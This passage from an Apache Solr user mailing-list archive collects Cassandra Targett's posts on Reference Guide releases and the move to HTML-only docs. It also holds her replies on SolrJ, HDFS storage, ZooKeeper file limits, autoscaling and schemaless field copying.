something it found in a file that happens to be used for the Ref Guide.

Ref Guide validation, where the Ref Guide tooling is used, happens in the 
‘documentation’ task so the culprit here is more likely the Rat tooling that’s 
used to validate all source files.

Cassandra


Solr Ref Guide Changes - now HTML only

2019-10-28 Thread Cassandra Targett
Hi all -

Some have already noticed this change, but to state it formally, as of 8.2,
the Lucene PMC will no longer treat the PDF version of the Solr
Reference Guide as the primary format, and we will no longer release a PDF
version. The Guide will now be available online only.

Some of you may prefer the PDF and will be disappointed by this change. To
explain, there are several reasons why we're doing this:

1. We believe that most in our community rely on the HTML version (at
https://lucene.apache.org/solr/guide), but since our release focus has been
the PDF version, we are not spending time making sure the HTML works as
well as it should and could.
2. The PDF has grown far too large. The 8.1 version is 1,483 pages, and
16 MB. Attempting to cut it back would be complex, and, considering it is a
less effective medium, possibly not worth the effort.
3. The release process held us back from getting the Guide out at the same
time as the artifact release (which is what has happened so far with 8.x
versions of the Guide).
4. Focusing on supporting the PDF first holds us back from several things
we would like to do in the HTML for better content presentation (including
easy-to-maintain architecture diagrams, proper formatting of math formulas,
and more complete language examples, among other things).

So, starting with 8.2 we are making a few changes:

1. The 8.2 version of the Ref Guide has been published in HTML form only (
https://lucene.apache.org/solr/guide/8_2/), and a PDF will not be available.
2. When 8.3 is released (soon), the HTML version will be available online
at the same time, and will be announced together.
3. For those who follow the development list, starting with 8.3 and going
forward a DRAFT version of the Guide will be available online as soon as a
Lucene & Solr release candidate is prepared and a VOTE thread has started.

If you are someone who wishes the PDF would continue, please share your
feedback. While the PDF is not sustainable in its current form - there are
pending changes that will break our current tooling entirely - we could see
if it's possible to find alternate ways to satisfy the same use cases.

Thanks to all of you for your continued support of Lucene and Solr, and we
look forward to making substantial improvements to the Guide in the months
to come.

Regards,
Cassandra


[ANNOUNCE] Apache Solr Reference Guide for 8.1 released

2019-06-18 Thread Cassandra Targett
The Lucene PMC is pleased to announce that the Solr Reference Guide for
Solr 8.1 is now available.

This 1,483 page PDF is the definitive guide to Apache Solr, the search
server built on Apache Lucene.

The PDF can be downloaded from:
https://www.apache.org/dyn/closer.cgi/lucene/solr/ref-guide/apache-solr-ref-guide-8.1.pdf

The Guide is also available online, at
https://lucene.apache.org/solr/guide/8_1/.

Regards,
The Lucene PMC


[ANNOUNCE] Apache Solr Reference Guide for 8.0 released

2019-06-10 Thread Cassandra Targett
The Lucene PMC is pleased to announce that the Solr Reference Guide for 8.0
is available.

This 1,452 page PDF is the definitive guide to Apache Solr, the search
server built on Apache Lucene.

The PDF can be downloaded from:
https://www.apache.org/dyn/closer.cgi/lucene/solr/ref-guide/apache-solr-ref-guide-8.0.pdf

The Guide is also available online, at
http://lucene.apache.org/solr/guide/8_0/.

While the Guide for 8.0 was delayed quite a bit after the release of 8.0
binaries, we don't anticipate the same delay for the 8.1 Guide, and are
working to make it available as soon as possible.

Regards,
The Lucene PMC


Re: Documentation for Apache Solr 8.0.0?

2019-04-03 Thread Cassandra Targett
The *DRAFT* 8.0 Guide is also available from Jenkins:

https://builds.apache.org/view/L/view/Lucene/job/Solr-reference-guide-8.0/javadoc/

Cassandra
On Apr 2, 2019, 3:23 AM -0500, Jan Høydahl , wrote:
> There is also a *DRAFT* HTML version of the to-be 8.1 guide built by Jenkins, 
> see
> https://builds.apache.org/view/L/view/Lucene/job/Solr-reference-guide-8.x/javadoc/
>  
> 
> It may serve as a place to read up while waiting for the 8,0 guide, as they 
> are almost identical still.
>
> --
> Jan Høydahl, search solution architect
> Cominvent AS - www.cominvent.com
>
> > 1. apr. 2019 kl. 16:11 skrev Jason Gerlowski :
> >
> > The Solr Reference Guide (of which the online documentation is a part)
> > gets built and released separately from the Solr distribution itself.
> > The Solr community tries to keep the code and documentation releases
> > as close together as we can, but the releases require work and are
> > done on a volunteer basis. No one has volunteered for the 8.0.0
> > reference-guide release yet, but I suspect a volunteer will come
> > forward soon.
> >
> > In the meantime though, there is documentation for Solr 8.0.0
> > available. Solr's documentation is included alongside the code. You
> > can checkout Solr and build the documentation yourself by moving to
> > "solr/solr-ref-guide" and running the command "ant clean default" from
> > that directory. This will build the same HTML pages you're used to
> > seeing at lucene.apache.org/solr/guide, and you can open the local
> > copies in your browser and browse them as you normally would.
> >
> > Alternatively, the Solr mirror on Github does its best to preview the
> > documentation. It doesn't display perfectly, but it might be helpful
> > for tiding you over until the official documentation is available, if
> > you're unwilling or unable to build the documentation site locally:
> > https://github.com/apache/lucene-solr/blob/branch_8_0/solr/solr-ref-guide/src/index.adoc
> >
> > Hope that helps,
> >
> > Jason
> >
> > On Mon, Apr 1, 2019 at 7:34 AM Yoann Moulin  wrote:
> > >
> > > Hello,
> > >
> > > I’m looking for the documentation for the latest release of Solr (8.0) 
> > > but it looks like it’s not online yet.
> > >
> > > https://lucene.apache.org/solr/news.html
> > >
> > > http://lucene.apache.org/solr/guide/
> > >
> > > Do you know when it will be available?
> > >
> > > Best regards.
> > >
> > > --
> > > Yoann Moulin
> > > EPFL IC-IT
>


ANNOUNCE: Solr Reference Guide for 7.6 released

2018-12-20 Thread Cassandra Targett
The Lucene PMC is pleased to announced that the Solr Reference Guide for
7.6 is now available.

This 1,415 page PDF is the definitive guide to Apache Solr, the search
server built on Apache Lucene.

The PDF can be downloaded from:
https://www.apache.org/dyn/closer.cgi/lucene/solr/ref-guide/apache-solr-ref-guide-7.6.pdf

The Guide is also available online, at
https://lucene.apache.org/solr/guide/7_6.

Regards,
The Lucene PMC


Re: Error when loading configset

2018-12-04 Thread Cassandra Targett
It’s also documented in the Solr Ref Guide:

https://lucene.apache.org/solr/guide/7_5/setting-up-an-external-zookeeper-ensemble.html#increasing-the-file-size-limit
 


Even if you aren’t on 7.5, the instructions will work for earlier versions 
since those params have been in ZK forever.

Cassandra

> On Dec 4, 2018, at 6:38 PM, Edward Ribeiro  wrote:
> 
> By default, ZooKeeper's maximum znode size is 1 MB. If you try to
> send more than this, an error occurs. You can increase this size limit
> but it has to be done both on server (ZK) and client (Solr) side. See this
> discussion for more details:
> 
> http://lucene.472066.n3.nabble.com/How-to-store-files-larger-than-zNode-limit-td4379893.html
> 
> Regards,
> Edward
> 
> Em ter, 4 de dez de 2018 20:39,  
>> Hi all,
>> i'm experiencing a problem when uploading a new configset on a Solr 7.5
>> instance running in cloud mode.
>> 
>> The problem seems to be related to the synonyms.txt file size: if it is larger
>> than about 1.5 MB, Solr returns an error:
>> 
>>  adding: synonyms.txt (deflated 76%)
>> {
>>  "responseHeader":{
>>"status":500,
>>"QTime":24325},
>>  "error":{
>>"msg":"KeeperErrorCode = ConnectionLoss for
>> /configs/pvee/synonyms.txt",
>> 
>> 
>> Since my file is about 6 MB, how can I fix this problem?
>> 
>> Regards
>> 
>> 



Re: Documentation on SolrJ

2018-11-30 Thread Cassandra Targett
Support for the JSON Facet API in SolrJ was very recently committed via 
https://issues.apache.org/jira/browse/SOLR-12965. This missed the cut-off for 
7.6 but will be included in 7.7 (if there is one) and/or 8.0. You may be able 
to use the patch there to see if there are gaps or bugs that could be fixed 
before 7.7 / 8.0.

Jason, who did the work on that issue, also presented on SolrJ at the Activate 
conference; you may find it interesting:
https://www.youtube.com/watch?v=ACPUR_GL5zM 


If you do find the time to write some docs, I’d be happy to give you some 
editing help. Just open a Jira issue when/if you’ve got something and we can go 
from there.

> On Nov 30, 2018, at 9:53 AM, Thomas L. Redman  wrote:
> 
> Hi Shawn, thanks for the prompt reply!
> 
>> On Nov 29, 2018, at 4:55 PM, Shawn Heisey  wrote:
>> 
>> On 11/29/2018 2:01 PM, Thomas L. Redman wrote:
>>> Hi! I am wanting to do nested facets/Grouping/Expand-Collapse using SolrJ, 
>>> and I can find no API for that. I see I can add a pivot field, I guess to a 
>>> query in general, but that doesn’t seem to work at all, I get an NPE. The 
>>> documentation on SolrJ is sorely lacking, the documentation I have found is 
>>> less than a readme. Are there any books that provided a good tretise on 
>>> SolrJ specifically? Does SolrJ support these more advanced features?
>> 
>> I don't have any specific details for that use case.
> 
> Check out page 498 of the PDF, which includes a brief but powerful discussion 
> of the JSON Facet API. For just one example, I am interested in faceting a 
> nominal field within a date range bucket. Example: I want to facet 
> publication_date field into YEAR buckets, and within each YEAR bucket, facet 
> on author to get the most prolific authors in that year, AND to also facet 
> genre with the same bucket to find out how much scifi, adventure and so on 
> was produced that year. From what I am seeing, beyond pivots (and pivots won’t 
> support this specific use case), I don’t see that this capability is supported by 
> the SolrJ API, but this is a hugely powerful feature, and needs to be 
> supported.
> 
> Furthermore, I want to be able to support a vaste range of facets within a 
> single query, perhaps including some collapse and expand, groupings and so on.
> 
>> 
>> If you share the code that gives you NPE, somebody might be able to help you 
>> get it working.
> 
> I haven’t looked in to this enough to drop it in somebody elses' lap at this 
> point, I suspect I am not using the API correctly. And since this won’t allow 
> what I want, I’m not too worried about it.
> 
>> 
>> The best place to find documentation for SolrJ is actually SolrJ itself -- 
>> the javadocs.  Much of that can be accessed pretty easily if you are using 
>> an IDE to do your development.  Here is a link to the top level of the SolrJ 
>> javadocs:
>> 
>> https://lucene.apache.org/solr/7_5_0/solr-solrj/index.html 
>> 
> 
> The JavaDocs are limited. I surmise from tracing the code a bit though that I 
> need to rely less on methods provided directly by SolrQuery, and add 
> parameters using methods of the superclasses more frequently. Those 
> superclass methods add simply key value pairs. Still not sure this will allow 
> me the flexibility I need, particularly if the JSON Facet API is not 
> supported.
> 
>> 
>> There's some documentation here, in the official reference guide:
>> 
>> https://lucene.apache.org/solr/guide/7_5/using-solrj.html 
>> 
> 
> This is an excellent document. It would be wonderful if a document of this 
> caliber was provided solely for SolrJ in the form of a tutorial. The existing 
> online tutorial says nothing about how to do anything beyond a simple query. 
> I notice in this document most of the examples of how to issue queries, for 
> example, use curl to issue the query. Simply put, this is not a practical 
> approach for the typical user. That being the case, people need to build real 
> UIs around applications that hide the intricacies of the search API. I would 
> rather not build my own API, since SolrJ is already in place, and seems quite 
> powerful. I have been using it for a few years, but really just to do queries.
> 
> I might be interested in contributing to such a document, provided it is 
> sufficiently succinct. I find myself quite busy these days. But I think I 
> would really have to ramp up my understanding of SolrJ to be of any use. Is 
> there any such document in the works, or any interested parties? I am NOT a 
> good writer, I would need somebody to review my work for both accuracy and 
> grammar.
> 
> Also, is the JSON API supported by SolrJ, or is there any plan to support it?



[ANNOUNCE] Solr Reference Guide for 7.5 released

2018-09-24 Thread Cassandra Targett
The Lucene PMC is pleased to announce that the Solr Reference Guide for
Solr 7.5 is now available.

This 1,389 page PDF is the definitive guide to Apache Solr, the search
server built on Apache Lucene.

The PDF can be downloaded from:
https://www.apache.org/dyn/closer.cgi/lucene/solr/ref-guide/apache-solr-ref-guide-7.5.pdf

The Guide is also available online, at
https://lucene.apache.org/solr/guide/7_5.

Regards,
Lucene PMC


Re: Solr Stale pages

2018-08-30 Thread Cassandra Targett
As Jan pointed out, unless your client sends Solr some instructions for
what to do with those documents specifically, Solr doesn't do anything.

In your example, Nutch crawls 30 documents at first, and 30 documents are
sent to Solr and added to the index. On next crawl, it finds 27 documents,
and 27 documents are sent to Solr. If these documents have the same unique
keys (IDs) as 27 documents already in the index, the documents in the index
will be updated (someone can correct me on this, but I believe these IDs
get updated even if the content itself has not changed).

Unless Nutch (or any other client) specifically tells Solr to do something
with the 3 documents that were not sent as part of this second update, Solr
does nothing with regard to those documents. Which makes sense, you don't
want Solr just deleting documents because you didn't happen to update them
with every indexing request.

Solr maintains no record of where a document came from, what client sent
it, nor whether subsequent updates from the same client update or do not
update the same set of documents as previous requests from the same client.
It is up to the client process itself to keep track of this, and send Solr
details of what to do with subsequent update requests. In this case, what
you want is for Nutch to send Solr a delete by ID request for those 3
documents so they are removed. I'm not sure if Nutch is capable of doing
that, however.

On Thu, Aug 30, 2018 at 7:00 AM kunhu0...@gmail.com 
wrote:

> Thanks for the update
>
> I'm using Nutch 1.14, Solr 6.6.3, and ZooKeeper 3.4.12. We are using two
> Solr nodes configured as SolrCloud. Please let me know if anything is
> missing
>
>
>
> --
> Sent from: http://lucene.472066.n3.nabble.com/Solr-User-f472068.html
>


[ANNOUNCE] Solr Reference Guide for 7.4 released

2018-06-28 Thread Cassandra Targett
The Lucene PMC is pleased to announce that the Solr Reference Guide for Solr
 7.4 is now available.

This 1,258 page PDF is the definitive guide to using Apache Solr, the
search server built on Apache Lucene.

The PDF Guide can be downloaded from:
https://www.apache.org/dyn/closer.cgi/lucene/solr/ref-guide/apache-solr-ref-guide-7.4.pdf

It is also available online at https://lucene.apache.org/solr/guide/7_4.


Re: Solr start script

2018-06-07 Thread Cassandra Targett
The reason why you pass the DirectoryFactory at startup is so every
collection/core that's created is automatically stored in HDFS before
solrconfig.xml is read to know that's where they should be stored.

If you prefer to only store certain collections/cores in HDFS, you would
only set those properties in the solrconfig.xml files for the collection.

The properties do still need to be defined in solrconfig.xml, which the
documentation you pointed to says - make the change in solrconfig.xml, then
pass the properties at startup.

On Thu, Jun 7, 2018 at 9:25 AM Greenhorn Techie 
wrote:

> Shawn, Thanks for your response. Please find my follow-up questions:
>
> 1. My understanding is that Directory Factory settings are typically at a
> collection / core level. If that's the case, what is the advantage of
> passing it along with the start script?
> 2. In your below response, did you mean that even though I pass the
> settings as part of start script, they dont have any value unless they are
> mentioned as part of the solrconfig.xml file?
> 3. As per my previous email, what does Solr do if my solrconfig.xml contains
> NRTDirectoryFactory setting while the solr script is started with HDFS
> settings?
>
> Thanks
>
>
> On 7 June 2018 at 15:08:02, Shawn Heisey (apa...@elyograg.org) wrote:
>
> On 6/7/2018 7:37 AM, Greenhorn Techie wrote:
> > When the above settings are passed as part of start script, does that
> mean
> > whenever a new collection is created, Solr is going to store the indexes
> in
> > HDFS? But what if I upload my solrconfig.xml to ZK which contradicts with
> > this and contains NRTDirectoryFactory setting? Given the above start
> > script, should / could I skip the directory factory setting section in my
> > solrconfig.xml with the assumption that the collections are going to be
> > stored on HDFS *by default*?
>
> Those commandline options are Java system properties.  It looks like the
> example configs DO have settings in them that would use the
> solr.directoryFactory and solr.lock.type properties.  But if your
> solrconfig.xml file doesn't reference those properties, then they
> wouldn't make any difference.  The last one is probably a setting that
> HdfsDirectoryFactory uses that doesn't need to be explicitly referenced
> in a config file.
>
> Thanks,
> Shawn
>


Re: HDP Search - Configuration & Data Directories

2018-06-07 Thread Cassandra Targett
The documentation for HDP Search is online (and included in the package
actually). This page has the descriptions for the Ambari parameters:
https://doc.lucidworks.com/lucidworks-hdpsearch/3.0.0/Guide-Install-Ambari.html
.

HDP Search is a package developed by Lucidworks but distributed by
Hortonworks, so Shawn is right, you should go through them for further
questions.

On Thu, Jun 7, 2018 at 8:39 AM Greenhorn Techie 
wrote:

> Thanks Shawn. Will check with Hortonworks!
>
>
> On 7 June 2018 at 14:19:43, Shawn Heisey (apa...@elyograg.org) wrote:
>
> On 6/7/2018 6:35 AM, Greenhorn Techie wrote:
> > A quick question on configuring Solr with Hortonworks HDP. I have
> installed
> > HDP and then installed HDP Search using the steps described under the
> link
>
> 
>
> > - Within the various Solr config settings on Ambari, I am a bit confused
> > on the role of "solr_config_conf_dir" parameter. At the moment, it only
> > contains log4j.properties file. As HDPSearch is mainly meant to be used
> > with SolrCloud, wondering what is the significance of this directory as
> the
> > configurations are always maintained on ZooKeeper.
>
> The text strings "solr_config_conf_dir" and "solr_config_data_dir" do
> not appear anywhere in the Lucene/Solr source code, even if I use a
> case-insensitive grep. Which must mean that it is specific to the
> third-party software you are using.  You'll need to ask your question to
> the people who make that third-party software.
>
> The log4j config is not in zookeeper.  That will be found on each
> server.  That file configures the logging framework at the JVM level, it
> is not specifically for Solr.
>
> Thanks,
> Shawn
>


Re: BlendedInfixSuggester wiki errata corrige

2018-06-06 Thread Cassandra Targett
Solr's documentation is now integrated with Lucene/Solr source code, so can
be edited by anyone who is willing or able to submit a patch for it. In
your case, you could integrate these edits with the code changes you're
making for the JIRA issues you reference and include them with the patches
you're working on. I would be happy to review your suggested edits as part
of those patches - I can give you feedback on the doc changes while
ignoring the code changes, which in this case I know nothing about.

If I may, could I suggest we not call Solr's official documentation a
"wiki"? It used to be a wiki, 5 years ago, and then we shifted to a wiki
platform without the wiki features, but since last year it's really not a
wiki at all - it's not a collaborative platform and it's not open for
anyone to edit. It's just the documentation, with edits made via commits to
Lucene/Solr source code in the same way as any code change.

- Cassandra

On Tue, Jun 5, 2018 at 10:06 AM Alessandro Benedetti 
wrote:

> Errata corrige to my Errata corrige post :
>
> e.g.
>
> Position of first match | 0 | 1   | 2   | 3
> Linear                  | 1 | 0.9 | 0.8 | 0.7
> Reciprocal              | 1 | 1/2 | 1/3 | 1/4
> Exponential Reciprocal  | 1 | 1/4 | *1/9* | 1/16
>
>
>
> -
> ---
> Alessandro Benedetti
> Search Consultant, R&D Software Engineer, Director
> Sease Ltd. - www.sease.io
> --
> Sent from: http://lucene.472066.n3.nabble.com/Solr-User-f472068.html
>


Re: Index protected zip

2018-05-29 Thread Cassandra Targett
Someone needs to update the Ref Guide. That can be a patch submitted on a
JIRA issue, or a committer could forego a patch and make changes directly
with commits.

Otherwise, this wiki page is making a bad situation even worse.

On Tue, May 29, 2018 at 12:06 PM Tim Allison  wrote:

> I’m happy to contribute to this message in any way I can.  Let me know how
> I can help.
>
> On Tue, May 29, 2018 at 2:31 PM Cassandra Targett 
> wrote:
>
> > It's not as simple as a banner. Information was added to the wiki that
> does
> > not exist in the Ref Guide.
> >
> > Before you say "go look at the Ref Guide" you need to make sure it says
> > what you want it to say, and the creation of this page just 3 days ago
> > indicates to me that the Ref Guide is missing something.
> >
> > On Tue, May 29, 2018 at 1:04 PM Erick Erickson 
> > wrote:
> >
> > > On further reflection ,+1 to marking the Wiki page superseded by the
> > > reference guide. I'd be fine with putting a banner at the top of all
> > > the Wiki pages saying "check the Solr reference guide first" ;)
> > >
> > > On Tue, May 29, 2018 at 10:59 AM, Cassandra Targett
> > >  wrote:
> > > > Couldn't the same information on that page be put into the Solr Ref
> > > Guide?
> > > >
> > > > I mean, if that's what we recommend, it should be documented
> officially
> > > > that it's what we recommend.
> > > >
> > > > I mean, is anyone surprised people keep stumbling over this? Shawn's
> > wiki
> > > > page doesn't point to the Ref Guide (instead pointing at other wiki
> > pages
> > > > that are out of date) and the Ref Guide doesn't point to that page.
> So
> > > half
> > > > the info is in our "official" place but the real story is in another
> > > place,
> > > > one we alternately tell people to sometimes ignore but sometimes keep
> > up
> > > to
> > > > date? Even I'm confused.
> > > >
> > > > On Sat, May 26, 2018 at 6:41 PM Erick Erickson <
> > erickerick...@gmail.com>
> > > > wrote:
> > > >
> > > >> Thanks! now I can just record the URL and then paste it in ;)
> > > >>
> > > >> Who knows, maybe people will see it first too!
> > > >>
> > > >> On Sat, May 26, 2018 at 9:48 AM, Tim Allison 
> > > wrote:
> > > >> > W00t! Thank you, Shawn!
> > > >> >
> > > >> > The "don't use ERH in production" response comes up frequently
> > enough
> > > >> >> that I have created a wiki page we can use for responses:
> > > >> >>
> > > >> >> https://wiki.apache.org/solr/RecommendCustomIndexingWithTika
> > > >> >>
> > > >> >> Tim, you are extremely well-qualified to expand and correct this
> > > page.
> > > >> >> Erick may be interested in making adjustments also. The flow of
> the
> > > page
> > > >> >> feels a little bit awkward to me, but I'm not sure how to improve
> > it.
> > > >> >>
> > > >> >> If the page name is substandard, feel free to rename.  I've
> already
> > > >> >> renamed it once!  I searched for an existing page like this
> before
> > I
> > > >> >> started creating it.  I did put a link to the new page on the
> > > >> >> ExtractingRequestHandler page.
> > > >> >>
> > > >> >> Thanks,
> > > >> >> Shawn
> > > >> >>
> > > >> >>
> > > >>
> > >
> >
>


Re: Index protected zip

2018-05-29 Thread Cassandra Targett
It's not as simple as a banner. Information was added to the wiki that does
not exist in the Ref Guide.

Before you say "go look at the Ref Guide" you need to make sure it says
what you want it to say, and the creation of this page just 3 days ago
indicates to me that the Ref Guide is missing something.

On Tue, May 29, 2018 at 1:04 PM Erick Erickson 
wrote:

> On further reflection ,+1 to marking the Wiki page superseded by the
> reference guide. I'd be fine with putting a banner at the top of all
> the Wiki pages saying "check the Solr reference guide first" ;)
>
> On Tue, May 29, 2018 at 10:59 AM, Cassandra Targett
>  wrote:
> > Couldn't the same information on that page be put into the Solr Ref
> Guide?
> >
> > I mean, if that's what we recommend, it should be documented officially
> > that it's what we recommend.
> >
> > I mean, is anyone surprised people keep stumbling over this? Shawn's wiki
> > page doesn't point to the Ref Guide (instead pointing at other wiki pages
> > that are out of date) and the Ref Guide doesn't point to that page. So
> half
> > the info is in our "official" place but the real story is in another
> place,
> > one we alternately tell people to sometimes ignore but sometimes keep up
> to
> > date? Even I'm confused.
> >
> > On Sat, May 26, 2018 at 6:41 PM Erick Erickson 
> > wrote:
> >
> >> Thanks! now I can just record the URL and then paste it in ;)
> >>
> >> Who knows, maybe people will see it first too!
> >>
> >> On Sat, May 26, 2018 at 9:48 AM, Tim Allison 
> wrote:
> >> > W00t! Thank you, Shawn!
> >> >
> >> > The "don't use ERH in production" response comes up frequently enough
> >> >> that I have created a wiki page we can use for responses:
> >> >>
> >> >> https://wiki.apache.org/solr/RecommendCustomIndexingWithTika
> >> >>
> >> >> Tim, you are extremely well-qualified to expand and correct this
> page.
> >> >> Erick may be interested in making adjustments also. The flow of the
> page
> >> >> feels a little bit awkward to me, but I'm not sure how to improve it.
> >> >>
> >> >> If the page name is substandard, feel free to rename.  I've already
> >> >> renamed it once!  I searched for an existing page like this before I
> >> >> started creating it.  I did put a link to the new page on the
> >> >> ExtractingRequestHandler page.
> >> >>
> >> >> Thanks,
> >> >> Shawn
> >> >>
> >> >>
> >>
>


Re: Index protected zip

2018-05-29 Thread Cassandra Targett
Couldn't the same information on that page be put into the Solr Ref Guide?

I mean, if that's what we recommend, it should be documented officially
that it's what we recommend.

I mean, is anyone surprised people keep stumbling over this? Shawn's wiki
page doesn't point to the Ref Guide (instead pointing at other wiki pages
that are out of date) and the Ref Guide doesn't point to that page. So half
the info is in our "official" place but the real story is in another place,
one we alternately tell people to sometimes ignore but sometimes keep up to
date? Even I'm confused.

On Sat, May 26, 2018 at 6:41 PM Erick Erickson 
wrote:

> Thanks! now I can just record the URL and then paste it in ;)
>
> Who knows, maybe people will see it first too!
>
> On Sat, May 26, 2018 at 9:48 AM, Tim Allison  wrote:
> > W00t! Thank you, Shawn!
> >
> > The "don't use ERH in production" response comes up frequently enough
> >> that I have created a wiki page we can use for responses:
> >>
> >> https://wiki.apache.org/solr/RecommendCustomIndexingWithTika
> >>
> >> Tim, you are extremely well-qualified to expand and correct this page.
> >> Erick may be interested in making adjustments also. The flow of the page
> >> feels a little bit awkward to me, but I'm not sure how to improve it.
> >>
> >> If the page name is substandard, feel free to rename.  I've already
> >> renamed it once!  I searched for an existing page like this before I
> >> started creating it.  I did put a link to the new page on the
> >> ExtractingRequestHandler page.
> >>
> >> Thanks,
> >> Shawn
> >>
> >>
>


[ANNOUNCE] Solr Reference Guide for Solr 7.3 released

2018-04-05 Thread Cassandra Targett
The Lucene PMC is pleased to announce that the Solr Reference Guide for
Solr 7.3 is now available.

This 1,295-page PDF is the definitive guide to using Apache Solr, the
search server built on Apache Lucene.

The PDF Guide can be downloaded from:
https://www.apache.org/dyn/closer.cgi/lucene/solr/ref-guide/apache-solr-ref-guide-7.3.pdf

It is also available online at https://lucene.apache.org/solr/guide/7_3.


Re: FW: Question about Overseer calling SPLITSHARD collection API command during autoscaling

2018-03-15 Thread Cassandra Targett
Hi Matthew -

It's cool to hear you're using the new autoscaling features.

To answer your first question, SPLITSHARD as an action for autoscaling is
not yet supported. As for when it might be, it's the next big gap to fill
in the autoscaling functionality, but there is some work to do first to
make splitting shards faster and safer overall. So, I hope we'll see it in
7.4, but there's a chance it won't be ready until the release after (7.5,
I'd assume).

AFAICT, there isn't a JIRA issue specifically for the SPLITSHARD support
yet, but there will be one relatively soon. There's an umbrella issue for
many of the open tasks if you're interested in that:
https://issues.apache.org/jira/browse/SOLR-9735 (although, it's not an
exhaustive roadmap, I don't think).

I think for the time being if you want/need to split a shard, you'd still
need to do it manually.
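
For reference, a manual split is a single Collections API call. A minimal
sketch (localhost and the collection/shard names are placeholders; add an
async parameter if you want to run it as an asynchronous request):

curl "http://localhost:8983/solr/admin/collections?action=SPLITSHARD&collection=myCollection&shard=shard1"

Solr creates two sub-shards from the shard you name and marks the parent
inactive once the new sub-shards are active.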

Hope this helps -
Cassandra

On Thu, Mar 15, 2018 at 11:41 AM, Matthew Faw 
wrote:

> I sent this a few mins ago, but wasn’t yet subscribed.  Forwarding the
> message along to make sure it’s received!
>
> From: Matthew Faw 
> Date: Thursday, March 15, 2018 at 12:28 PM
> To: "solr-user@lucene.apache.org" 
> Cc: Matthew Faw , Alex Meijer <
> alex.mei...@verato.com>
> Subject: Question about Overseer calling SPLITSHARD collection API command
> during autoscaling
>
> Hi,
>
> So I’ve been trying out the new autoscaling features in solr 7.2.1.  I run
> the following commands when creating my solr cluster:
>
>
> Set up overseer role:
> curl -s "solr-service-core:8983/solr/admin/collections?action=
> ADDROLE=overseer=$thenode"
>
> Create cluster prefs:
> clusterprefs=$(cat <<-EOF
> {
> "set-cluster-preferences" : [
>   {"minimize":"sysLoadAvg"},
>   {"minimize":"cores"}
>   ]
> }
> EOF
> )
> echo "The cluster prefs request body is: $clusterprefs"
> curl -H "Content-Type: application/json" -X POST -d
> "$clusterprefs" solr-service-core:8983/api/cluster/autoscaling
>
> Cluster policy:
> clusterpolicy=$(cat <<-EOF
> {
> "set-cluster-policy": [
>   {"replica": 0, "nodeRole": "overseer"},
>   {"replica": "<2", "shard": "#EACH", "node": "#ANY"},
>   {"cores": ">0", "node": "#ANY"},
>   {"cores": "<5", "node": "#ANY"},
>   {"replica": 0, "sysLoadAvg": ">80"}
>   ]
> }
> EOF
> )
> echo "The cluster policy is $clusterpolicy"
> curl -H "Content-Type: application/json" -X POST -d
> "$clusterpolicy" solr-service-core:8983/api/cluster/autoscaling
>
> nodeaddtrigger=$(cat <<-EOF
> {
>  "set-trigger": {
>   "name" : "node_added_trigger",
>   "event" : "nodeAdded",
>   "waitFor" : "1s"
>  }
> }
> EOF
> )
> echo "The node added trigger request: $nodeaddtrigger"
> curl -H "Content-Type: application/json" -X POST -d
> "$nodeaddtrigger" solr-service-core:8983/api/cluster/autoscaling
>
>
> I then create a collection with 2 shards and 3 replicas, under a set of
> nodes in an autoscaling group (initially 4, scales up to 10):
> curl -s "solr-service-core:8983/solr/admin/collections?action=
> CREATE=${COLLECTION_NAME}=${NUM_SHARDS}&
> replicationFactor=${NUM_REPLICAS}=${
> AUTO_ADD_REPLICAS}=${COLLECTION_NAME}&
> waitForFinalState=true"
>
>
> I’ve observed several autoscaling actions being performed – automatically
> re-adding replicas, and moving shards to nodes based on my cluster
> policy/prefs.  However, I have not observed a SPLITSHARD operation.  My
> question is:
> 1) should I expect the Overseer to be able to call the SPLITSHARD command,
> or is this feature not yet implemented?
> 2) If it is possible, do you have any recommendations as to how I might
> force this type of behavior to happen?
> 3) If it’s not implemented yet, when could I expect the feature to be
> available?
>
> If you need any more details, please let me know! Really excited about
> these new features.
>
> Thanks,
> Matthew
>
> The content of this email is intended solely for the individual or entity
> named above and access by anyone else is unauthorized. If you are not the
> intended recipient, any disclosure, copying, distribution, or use of the
> contents of this information is prohibited and may be unlawful. If you have
> received this electronic transmission in error, please reply immediately to
> the sender that you have received the message in error, and delete it.
> Thank you.
>


Re: What is creating certain fields?

2018-03-07 Thread Cassandra Targett
I'll guess you're using Solr 7.x and those fields in your schema were
created automatically?

As of Solr 7.0, the schemaless mode field guessing added a copyField rule
for any field that's guessed to be text to copy the first 256 characters to
a multivalued string field. The way it works is a field is created with the
type "text_general", and a copyField is then automatically created with the
dynamic field rule "*_str" to create the multivalued string field.

This came from https://issues.apache.org/jira/browse/SOLR-9526.

You can prohibit the behavior if you want to by removing the copyField rule
section. See the docs for where in the solrconfig.xml you will want to
edit:
https://lucene.apache.org/solr/guide/schemaless-mode.html#enable-field-class-guessing
.
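
For reference, the relevant piece of the _default configset's solrconfig.xml
looks roughly like this (paraphrased, with the other type mappings omitted -
check your own file for the exact form). Deleting the copyField block is what
stops the *_str copies:

<updateProcessor class="solr.AddSchemaFieldsUpdateProcessorFactory" name="add-schema-fields">
  <lst name="typeMapping">
    <str name="valueClass">java.lang.String</str>
    <str name="fieldType">text_general</str>
    <lst name="copyField">
      <str name="dest">*_str</str>
      <int name="maxChars">256</int>
    </lst>
  </lst>
</updateProcessor>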

Cassandra

On Wed, Mar 7, 2018 at 9:46 AM, Erick Erickson 
wrote:

> Maybe  a copyField is realizing the dynamic fields?
>
>
> On Wed, Mar 7, 2018 at 7:43 AM, David Hastings
>  wrote:
> > those are dynamic fields.
> >
> >> indexed="false" stored="false"/>
> >
> >
> > On Wed, Mar 7, 2018 at 12:43 AM, Keith Dopson 
> wrote:
> >
> >> My default query produces this:
> >>
> >> |  {
> >> "id":"44419",
> >> "date":["11/13/17 13:18"],
> >> "url":["http://www.someurl.com;],
> >> "title":["some title"],
> >> "content":["some indexed content..."],
> >> "date_str":["11/13/17 13:18"],
> >> "url_str":["http://www.someurl.com;],
> >> "title_str":["some title"],
> >> "_version_":1594211356390719488,
> >> "content_str":["some indexed content.."]
> >> },
> >>
> >>
> >> In my managed_schema file, I only have five populated fields,
> >>
> >> >> required="true" multiValued="false" />
> >>
> >> >> stored="true"/>
> >> >> stored="true"/>
> >> >> stored="true"/>
> >> >> stored="true"/>
> >>
> >> While other fields are declared, none of them are populated by my "post"
> >> command.
> >>
> >> My question is "Where are the x_str fields coming from?
> >> I.e., what is producing the
> >> |
> >> ||"date_str":["...
> >> "url_str":["...
> >> "title_str":["...
> >> "content_str":["...|
> >>
> >> entries?
> >>
> >> Thanks in advance.
> >> |
> >>
> >>
> >>
>


